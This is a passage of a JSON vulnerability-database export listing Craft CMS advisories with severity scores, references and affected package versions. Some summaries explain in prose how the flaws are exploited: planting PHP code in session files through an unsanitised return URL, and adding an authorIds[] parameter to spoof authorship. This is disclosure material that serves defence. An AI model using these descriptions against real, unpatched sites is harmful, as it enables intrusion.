issue.","references":[{"reference_url":"http://github.com/craftcms/cms/pull/17026","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://github.com/craftcms/cms/pull/17026"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-46731","reference_id":"","reference_type":"","scores":[{"value":"0.00909","scoring_system":"epss","scoring_elements":"0.76214","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-46731"},{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-46731","reference_id":"CVE-2025-46731","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-46731"},{"reference_url":"https://github.com/advisories/GHSA-7c58-g782-9j38","reference_id":"GHSA-7c58-g782-9j38","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7c58-g782-9j38"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7c58-g782-9j38","reference_id":"GHSA-7c58-g782-9j38","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7c58-g782-9j38"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv","reference_id":"GHSA-f3cw-hg6r-chfv","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/85041?format=json","purl":"pkg:composer/craftcms/cms@5.6.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.6.15"}],"aliases":["CVE-2025-46731","GHSA-7c58-g782-9j38"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jsfs-azcs-mfcm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57273?format=json","vulnerability_id":"VCID-jxet-d8ux-mkge","summary":"Craft CMS stores arbitrary content provided by unauthenticated users in session files. This content could be accessed and executed, possibly using an independent vulnerability. Craft CMS redirects requests that require authentication to the login page and generates a session file on the server at `/var/lib/php/sessions`. Such session files are named `sess_[session_value]`, where `[session_value]` is provided to the client in a `Set-Cookie` response header. Craft CMS stores the return URL requested by the client without sanitizing parameters. Consequently, an unauthenticated client can introduce arbitrary values, such as PHP code, to a known local file location on the server. Craft CMS versions 5.7.5 and 4.15.3 have been released to address this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-35939","reference_id":"","reference_type":"","scores":[{"value":"0.33065","scoring_system":"epss","scoring_elements":"0.96993","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-35939"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e4c7bac8f31010aee048409f9ef6f744a83146b2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/e4c7bac8f31010aee048409f9ef6f744a83146b2"},{"reference_url":"https://github.com/craftcms/cms/pull/17220","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"}],"url":"https://github.com/craftcms/cms/pull/17220"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.15.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.15.3"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.7.5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.7.5"},{"reference_url":"https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-147-01.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"}],"url":"https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-147-01.json"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-35939","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-35939"},{"reference_url":"https://www.cve.org/CVERecord?id=CVE-2025-35939","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"}],"url":"https://www.cve.org/CVERecord?id=CVE-2025-35939"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-35939","reference_id":"CVE-2025-35939","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-35939"},{"reference_url":"https://github.com/advisories/GHSA-7vrx-9684-xrf2","reference_id":"GHSA-7vrx-9684-xrf2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7vrx-9684-xrf2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74789?format=json","purl":"pkg:composer/craftcms/cms@5.7.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.7.5"}],"aliases":["CVE-2025-35939","GHSA-7vrx-9684-xrf2"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jxet-d8ux-mkge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50633?format=json","vulnerability_id":"VCID-jxz8-g6fq-dubw","summary":"Craft CMS: Entries Authorship Spoofing via Mass Assignment\nThe entry creation process allows for **Mass Assignment** of the `authorId` attribute. A user with \"Create Entries\" permission can inject the `authorIds[]` (or `authorId`) parameter into the POST request, which the backend processes without verifying if the current user is authorized to assign authorship to others.\n\nNormally, this field is not present in the request for users without the necessary permissions. By manually adding this parameter, an attacker can attribute the new entry to any user, including Admins. This effectively \"spoofs\" the authorship.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28781","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.16153","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28781"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/830b403870cd784b47ae42a3f5a16e7ac2d7f5a8","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:36:36Z/"}],"url":"https://github.com/craftcms/cms/commit/830b403870cd784b47ae42a3f5a16e7ac2d7f5a8"},{"reference_url":"https://github.com/craftcms/cms/commit/c6dcbdffaf6ab3ffe77d317336684d83699f4542","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:36:36Z/"}],"url":"https://github.com/craftcms/cms/commit/c6dcbdffaf6ab3ffe77d317336684d83699f4542"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28781","reference_id":"CVE-2026-28781","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28781"},{"reference_url":"https://github.com/advisories/GHSA-2xfc-g69j-x2mp","reference_id":"GHSA-2xfc-g69j-x2mp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2xfc-g69j-x2mp"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2xfc-g69j-x2mp","reference_id":"GHSA-2xfc-g69j-x2mp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:36:36Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-2xfc-g69j-x2mp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28781","GHSA-2xfc-g69j-x2mp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jxz8-g6fq-dubw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50075?format=json","vulnerability_id":"VCID-kbrc-85av-nfcn","summary":"Craft CMS: GraphQL Asset Mutation Privilege Escalation\nType: Privilege Escalation (CWE-269)\nAffected: Craft CMS 5.x (likely affects 4.x and 3.x as well)\nLocation: `src/gql/resolvers/mutations/Asset.php lines 57-107`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25497","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06198","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25497"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/ac7edf868c1a81fd9c4dc49d3b3edf1cce113409","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:18Z/"}],"url":"https://github.com/craftcms/cms/commit/ac7edf868c1a81fd9c4dc49d3b3edf1cce113409"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.0-beta.1","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.0-beta.1"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:18Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.0-beta.1","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.0-beta.1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25497","reference_id":"CVE-2026-25497","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25497"},{"reference_url":"https://github.com/advisories/GHSA-fxp3-g6gw-4r4v","reference_id":"GHSA-fxp3-g6gw-4r4v","reference_type":"","scores"